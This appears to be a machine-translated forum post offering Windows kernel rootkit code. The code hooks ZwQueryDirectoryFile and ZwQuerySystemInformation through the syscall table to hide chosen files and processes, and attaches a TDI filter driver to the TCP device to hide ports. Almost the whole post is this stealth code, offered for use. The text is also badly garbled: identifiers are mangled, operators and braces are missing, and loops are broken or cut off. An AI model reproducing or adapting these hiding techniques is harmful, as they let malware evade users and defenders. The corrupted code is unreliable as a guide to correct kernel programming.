Hide any process, directory file, registry, port
Hide any process, directory / file, registry, port
Find Process, Directory / File, Registry and other operating systems will eventually call ZWQueryDirectoryFile, ZwQuerySystemInformation,
ZwxxValueKey and other functions. To intercept these functions to achieve hidden purposes, you need to implement the above functions, and modify one of the system maintenance.
Syscall Escapes the function that is predefined in advance. Because the syscall table is not visible in the user layer, I have to write Drive under Ring 0.
Can be modified. There is already a detailed introduction to how to modify the article, which is not detailed. (You can see Sysinternals.com or Webcrazy "
Written article). The lookup port is a TDI query. TDI exports two devices // device // TCP and // device // UDP. We can benefit
Write a Drive by the device filtering drive to take over all IRP packets of the two devices to proceed to the lower drive. Reach
The purpose of hiding any port. The method mentioned above is not a new thing, it is already old technologies in N years ago. Hey, it is now posted it out.
Enrich the top floor, irrigation and water. Don't read it. Here is the hidden process, directory / file, port code snippet in my Drive.
(The registry operation is written in Regmon, which is not listed here)
TypeDef struct _filetime
{
DWORD DWLOWDATETIME;
DWORD DWHIGHDATETIME;
} Filetime;
Typedef struct _direntry
{
DWORD DWLENTONEXT;
DWORD DWATTR;
Filetime FTCREATE, FTLASTACCESS, FTLASTWRITE
DWORD DWUNKNOWN [2];
DWORD DWFILESZELOW;
DWORD DWFILESIGH;
DWORD dwunknown2 [3];
Word wnamelen;
Word wunknown;
DWORD DWUNKNOWN3;
Word wshortnamelen;
Wchar SWSHORTNAME [12];
Wchar Suname [1];
Direntry, * pdirentry;
Struct _system_threads
{
Large_integer kernetime;
Large_integer usertime;
Large_integer createtime;
Ulong Waittime;
Pvoid Startaddress;
Client_id clientis;
KPRIORITY PRIORITY
KPRIORITY BASEPRIORITY
Ulong contextswitchcount;
Ulong threadState;
Kwait_reason waitreason;
}
Struct _system_processes
{
Ulong nextentryDelta;
Ulong threadcount;
Ulong reserved [6];
Large_integer createtime;
Large_integer usertime;
Large_integer kernetime;
Unicode_string processname;
KPRIORITY BASEPRIORITY
Ulong processid;
Ulong inheritedFromProcessId;
Ulong handlecount;
Ulong reserved2 [2]; vm_counters vmcounters;
IO_COUNTERS IOCOUNTERS;
Struct _system_threads throughs [1];
}
// Hidden Directory / File
NTSTATUS HOOKZWQUERYDIRECTORYFILE
In Handle Hfile,
In Handle HEVENT OPTIONAL,
In Pio_APC_Routine IoapCroutine Optional,
In Pvoid IoapcContext Optional,
OUT PIO_STATUS_BLOCK PIOSTATUSBLOCK,
Out pvoid fileinformationBuffer,
In Ulong FileinformationBufferlength,
IN file_information_class fileinfoclass,
In Boolean Breturnonlyneentry,
In Punicode_String Pathmask Optional,
In Boolean BrestartQuery)
{
NTSTATUS RC;
CHAR APROCESSNAME [80];
ANSI_STRING ANSIFILENAME, ANSIDIRNAME
Unicode_string unifilename;
PP_DIR PTR;
Wchar Parentdirectory [1024] = {0};
INT BYTESRETURNED;
PVOID Object;
// Execute the old ZwqueryDirectoryFile function
RC = ((zwquerydirectoryfile) (OldzwQueryDirectoryFile))
Hfile,
HEVENT,
IOAPCROUTINE,
IOAPCCONTEXT,
Piostatusblock,
FileInformationBuffer,
FileInformationBufferlength,
FileInfoclass,
BreturnonlyoneTry,
Pathmask,
BRESTARTQUERY);
IF (NT_Success (RC))
{
PDIRENTRY P;
PDIRENTRY PLAST;
Bool Blastone;
Int Found;
p = (pdirentry) fileinformationBuffer; // will find the result to assign a structure
Plast = NULL;
DO
{
Blastone =! (P-> dwlentonext);
RTLINITUNICODESTRING (& UNIFILENAME, P-> Suname);
RTLUNICODESTRINGTOANSISTRING (& AnsifileName, & UnifileName, True);
RTLUNICODESTRINGTOANSISTRING (& ANSIDIRNAME, & UNIFILENAME, TRUE);
RTLUPPERSTRING (& ANSIFILENAME, & ANSIDIRNAME);
Found = 0;
/ / Find if you contain the current directory in the list
For (ptr = list_head; ptr! = null; ptr = ptr-> Next)
{
IF (Ptr-> Flag! = PTR_HIDEDIR) Continue;
IF (RTLCompareMemory (ANSIFILENAME.BUFFER, PTR-> Name, Strlen (Ptr-> Name)) == Strlen (Ptr-> Name))
{
FOUND = 1;
Break;
}
} // end for
// If the list contains the current directory, hide if (Found)
{
IF (Blastone)
{
IF (p == (pdirentry) fileinformationBuffer
{
Rc = 0x8000000006; // Hide
}
Else
Plast-> DWLENTONEXT = 0;
Break;
}
Else
{
INT IPOS = (Ulong) P) - (Ulong) FileinformationBuffer;
INT ILEFT = (DWORD) FILEINFORMATIONBUFFERLENGTH - IPOS - P-> DWLENTONEXT;
RTLCopyMemory (PVOID) P, (PVOID) ((char *) p p-> dwlentonext), (DWORD) ILEFT);
CONTINUE;
}
}
Plast = P;
P = (PDIRENTRY) ((char *) P P-> dwlentonext);
} while (!!);
RTLFreeansString (& ANSIDIRNAME);
RTLFreeansString (& ANSIFILENAME);
}
Return (RC);
}
// Hidden process
NTSTATUS HOOKZWQUERYSYSTEMINFORMATION
In Ulong SystemInformationClass,
In Pvoid SystemInformation,
In Ulong SystemInformationLength,
OUT Pulong ReturnLength)
{
NTSTATUS RC;
ANSI_STRING Process_name, process_uname, process_name1, process_name2;
Bool g_hide_proc = true;
CHAR APROCESSNAME [80];
PP_DIR PTR;
Int Found;
// Execute the old ZWQuerySystemInformation function
RC = ((zwQuerySystemInformation) (OldzwQuerySystemInformation))
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength;
IF (NT_Success (RC))
{
IF (g_hide_proc && (5 == systeminformationClass))
{
// will find the result to give the structure
Struct _system_processes * curr = (struct _system_processes *) SystemInformation;
Struct _system_processes * prev = null;
// Traverse process
While (Curr)
{
IF ((0
{
Found = 0;
// Traverse
For (ptr = list_head; ptr! = null; ptr = ptr-> Next)
{
IF (Ptr-> Flag! = PTR_HIDEPROC) Continue;
IF (Memcmp (Process_name.buffer, Ptr-> Name, Strlen (Ptr-> Name)) == 0)
{
FOUND = 1;
}
}
// Judgment If it is the hidden process name, override this process name
While (Found) {
IF (prev)
{
IF (Curr-> NEXTENTRYDELTA)
{
Prev-> NEXTENTRYDELTA = CURR-> NEXTENTRYDELTA;
}
Else
{
Prev-> NEXTENTRYDELTA = 0;
}
}
Else
{
IF (Curr-> NEXTENTRYDELTA)
{
(char *) Systeminformation = curr-> nextentryDelta;
}
Else
{
Systeminformation = NULL;
}
}
IF (Curr-> NEXTENTRYDELTA) (CHAR *) CURR = CURR-> NEXTENTRYDELTA);
Else
{
Curr = NULL; BREAK;
}
// Traverse
Found = 0;
For (ptr = list_head; ptr! = null; ptr = ptr-> Next)
{
IF (Ptr-> Flag! = PTR_HIDEPROC) Continue;
IF (Memcmp (Process_name.buffer, Ptr-> Name, Strlen (Ptr-> Name)) == 0)
{
FOUND = 1;
}
}
}
}
IF (Curr! = null)
{
Prev = CURR;
IF (Curr-> NEXTENTRYDELTA) (CHAR *) CURR = CURR-> NEXTENTRYDELTA);
Else Curr = NULL;
}
}
}
}
Return (RC);
}
// Hide port
PDEvice_Object M_TcpGetDevice;
PDEvice_Object TcpDevice;
Unicode_string tcpDeviceName;
PDRIVER_OBJECT TCPDRIVER;
PDEvice_Object TCPGETDEVICE;
PDEvice_Object FilterDevice
PDRIVER_DISPATCH EMPTY;
NTSTATUS STATUS;
Empty = driverObject-> majorfunction [IRP_MJ_CREATE];
RTLINITUNICODESTRING (& TCPDeviceName, L "// device // tcp");
/ / Get existing equipment pointers
Status = IOGETDEVICEOBJECTPOINTER (& TCPDeviceName,
FILE_ALL_ACCESS,
& FileObject,
& TcpDevice
);
IF (! NT_Success (status))
{
DBGPrint ("IOGETDEVICEOBJECTPOINTER ERROR! / N");
Return status;
}
DBGPRINT ("IOGETDEVICEOBJECTPOINTER OK! / N");
// Establish a device
Status = IOCREATEVICE (DriverObject,
SIZEOF (Device_extension),
NULL,
File_Device_unknown,
0,
False,
& Filterdevice
);
IF (! NT_Success (status))
{
Return status;
}
// Add to equipment
TCPGETDEVICE = IoattachDeviceTodeviceStack (FilterDevice, TCPDevice);
IF (! tcpgetDevice) {
IodeleteDevice (FilterDevice);
DBGPrint ("IoattachDeventodeviceStack Error! / N");
Return status_success;
}
m_tcpgetDevice = tcpgetDevice;
/ / Add to the filter function
For (i = 0; i { IF ((tcpdriver-> majorfunction "&& (driverObject-> majorfunction [i] == empty)) { DriverObject-> majorfunction [i] = passthrough; } } ObdereferenceObject (fileObject); NTSTATUS PASSTHROUGH (in PDEvice_Object DeviceObject, in PIRP IRP) { NTSTATUS STATUS; PIO_STACK_LOCATION PIRPSTACK; PirPstack = IOGETCURRENTIRPSTACKLOCATION (IRP); // If you query, complete the IRP. IF (pirpstack-> parameters.deviceioControl.iocontrolcode == query_information_ex) { / / You can judge a port next step. IRP-> iostatus.status = status_success; IOCOMPLETEREQUEST (IRP, IO_NO_INCREMENT); Return status_success; } // Copy the current IRP IocopyCurrentirPstackLocationToneXT (IRP); IOSetCompletionRoutine (IRP, GenericCompletion, NULL, True, True, True ); //transfer Return IocallDriver (M_TcpGetDevice, IRP); }
